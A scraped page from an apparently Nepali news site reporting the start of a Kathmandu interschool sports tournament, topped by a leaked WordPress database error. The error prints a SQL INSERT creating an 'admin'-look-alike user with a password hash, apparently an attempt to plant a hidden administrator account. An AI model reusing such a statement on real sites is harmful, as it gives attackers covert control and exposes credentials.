WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BebIb08O7cwQFDkFtruf/bfw/Cmg9H0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:23:55', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर १९ – पाँचाँै काठमाडौँ
उपत्यकाव्यापी अन्तरविद्यालय ‘दि एक्सेल्सिएर कप २०७३’ आजदेखि यहाँ सुरु भएको छ ।
स्वयम्भूस्थित एक्सेल्सिएर स्कुलमा सुरु भएको कार्यक्रमको सशस्त्र प्रहरी बलका अतिरिक्त महानिरीक्षक शैलेन्द्र खनालले उद्घाटन गर्दै विद्यार्थीको शारीरिक, मानसिक र चौतर्फी विकासका लागि खेलकुद अपरिहार्य भएको बताउनुभयो ।
नेपाली फुटबलका पूर्वकप्तान राजु खड्का, स्कुलका प्रबन्ध निर्देशक राम बस्नेत, प्रिन्सिपल शीतल राणा लगायतले प्रतियोगीले सफलताको कामना व्यक्त गर्नुभयो । यही मङ्सिर २६ गतेसम्म चल्ने प्रतियोगितामा २८ विद्यालयका विद्यार्थीको सहभागिता छ । सोअन्तर्गत फाइभ ए साइड फुटबल र सिनियर तथा जुनियर बास्केटबल प्रतियोगिता हुनेछ । – रासस